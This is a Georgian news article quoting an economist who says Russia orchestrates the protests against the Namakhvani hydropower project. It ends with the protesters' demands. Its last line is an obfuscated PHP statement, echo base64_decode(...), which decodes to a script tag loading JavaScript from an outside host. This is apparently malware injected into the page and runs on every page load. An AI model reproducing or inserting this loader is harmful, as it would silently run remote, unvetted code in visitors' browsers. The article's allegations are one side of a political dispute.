celsiusi
ავერსი შნაიდერი
რთულია, როდესაც ტელევიზორს რთავ და უცხო ქვეყნის სპეცსამსახურების ორგანიზებულ აქციას უყურებ შენივე დედაქალაქში, - ამის შესახებ ეკონომისტი ანდრია გვიდიანი აცხადებს. 
 
მისივე თქმით, უამრავი აქცია უნახავს, უამრავი შეძახილი მუსმენია, მაგრამ იმაზე მძიმე სანახავი, რაც დღეს რესპუბლიკის მოედანზე ხდება, იშვიათად ახსენდება.
 
"რთულია, როდესაც ტელევიზორს რთავ და უცხო ქვეყნის სპეცსამსახურების ორგანიზებულ აქციას უყურებ შენივე დედაქალაქში. ამაზე უფრო რთული სანახავია, როდესაც შენი ქვეყნის მოქალაქეები ამ ყველაფერში მონაწილეობენ, თან დიდი სიამოვნებით. სამწუხაროდ, საზოგადოების მცირე ნაწილს გულწრფელად სჯერა, რომ ჰესების წინააღმდეგ ბრძოლა მართლა რაიმე კავშირშია პატრიოტიზმთან. დღესავით ნათელია, რუსული ინტერესები საქართველოს ენერგეტიკული უსაფრთხოების შეფერხების კონტექსტში. სწორედ რუსეთის მიერ წლების მანძილზე ნაბიჯ-ნაბიჯ მიმდინარეობს ორკესტრირებული კამპანია საქართველოს ენერგოდამოუკიდებლობის წინააღმდეგ. სწორედ ამ მიზანმიმართული და უშინაარსო კამპანიის შედეგია გაყინული 4 მილიარდი დოლარის ინვესტიციები, გაჩერებული 100-მდე პროექტი და, ზოგადად, განვითარების დაბალი ტემპი" , - ამბობს გვიდიანი. 
ანდრია გვიდიანი რუსულ ინტერესებზე საუბრობს და აცხადებს, რომ რუსეთი იმპერიალისტური დოქტრინის მქონე ქვეყანაა, რომელიც მუდმივად ცდილობს ჰქონდეს ჩვენნაირი ქვეყნების მართვის ბერკეტები. შესაბამისად, იმპერიას არაფერში სჭირდება ძლიერი, წელში გამართული და საკუთარი რესურსების მქონე საქართველო. 
 
"რაც შეეხება უშუალოდ "ნამახვანჰესს", მე პირადად უკვე დიდი ხანია ამ პროექტს აღარ განვიხილავ წმინდა ენერგეტიკულ, ეკონომიკურ, ფინანსურ ან სხვა ტექნიკურ ასპექტში. ოპონენტების მხრიდან, "ნამახვანჰესის" შესახებ უკვე აღარ ისმის არც გარემოსდაცვითი და არც სხვა სახის პრეტენზიები. "რიონის მცველები" და ე.წ. გარემოსდამცველები უკვე ღიად ამბობენ, რომ პროექტი უბრალოდ არ უნდა განხორციელდეს და მორჩა. შესაბამისად, ვფიქრობ, რომ ამ ჰესის წინააღმდეგ მიმართული პროტესტი დიდი ხანია გასცდა ენერგეტიკის დარგს და მიიღო ეროვნული უსაფრთხოების მნიშვნელობა. ჩვენ, ჩვენივე ირაციონალური და ემოციური ქმედებებით ქვეყნის განვითარების შანსი უამრავჯერ გავუშვით ხელიდან. დამოუკიდებლობა მოვიპოვეთ, მაგრამ ვერ ვისწავლეთ დამოუკიდებლად აზროვნება. ჩვენ ემოციებით ვღებულობთ გადაწყვეტილებებს, პრინციპულად უარს ვამბობთ რაციონალურ მსჯელობაზე და არაფრის დიდებით არ გვინდა ჩვენს ქმედებებს ცოტა ტვინიც მივახმაროთ", - განმარტავს ანდრია გვიდიანი. 
 
გვიდიანი საკუთარ სოციალურ გვერდზე წერს, რომ  ჩვენ გვინდა ინვესტიციები, მაგრამ არ გვინდა ინვესტორები.
 
"ჩვენ გვინდა ენერგოუსაფრთხოება, მაგრამ არ გვინდა ენერგეტიკა;  ჩვენ გვინდა ვიყოთ მდიდრები, მაგრამ არაფერს ვაკეთებთ ამისთვის; ჩვენ გვინდა ვიყოთ ძლიერები, მაგრამ შეგნებულად უარს ვამბობთ განვითარებაზე;  ჩვენ გვინდა ვიყოთ ჭკვიანები, მაგრამ პრინციპულად უარს ვამბობთ აზროვნებაზე. ასე არ გამოდის, ასე ვერ განვვითარდებით, ასე არ შენდება ძლიერი სახელმწიფოები. სანამ არ დავიწყებთ ლაპარაკს, სანამ კეთილს არ ვინებებთ და არ დავიწყებთ აზროვნებას, ყოველთვის ვიქნებით წუმპეში, ვიქნებით ღარიბები, ვიქნებით მაჩანჩალები და მუდამ ვიფიქრებთ, თუ ვის გადავაბრალოთ ჩვენი არასახარბიელო მდგომარეობა", - დასძენა ანდრია გვიდიანმა. 
 
შეგახსენებთ, რომ საპროტესტო აქციის მონაწილეთა მოთხოვნები ასეთია:
 
გაწყდეს 2019 წ. 25 აპრილს ხელმოწერილი ხელშეკრულება საქართველოს მთავრობასა და კომპანია „ენკა რინიუებლზს“ შორის მდინარე რიონზე დაგეგმილი ნამახვანის ჰესების კასკადის მშენებლობის შესახებ და კომპანიამ დატოვოს რიონის ხეობა.
 
გაუქმდეს საქართველოს მთავრობის 2019 წლის 21 ნოემბრის #2405 განკარგულება "სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს "ენკა რინიუებლზისათვის" აღნაგობის უფლებით გადაცემაზე თანხმობის მიცემისა და პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ".
 
გაუქმდეს ნამახვანის ჰესების კასკადზე 2015 წელს გაცემული სამშენებლო ნებართვა და ყველა სხვა მასზე დაფუძნებული დოკუმენტი.
 
თანამდებობიდან გადადგეს ეკონომიკისა და მდგრადი განვითარების მინისტრი ნათია თურნავა
1543
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");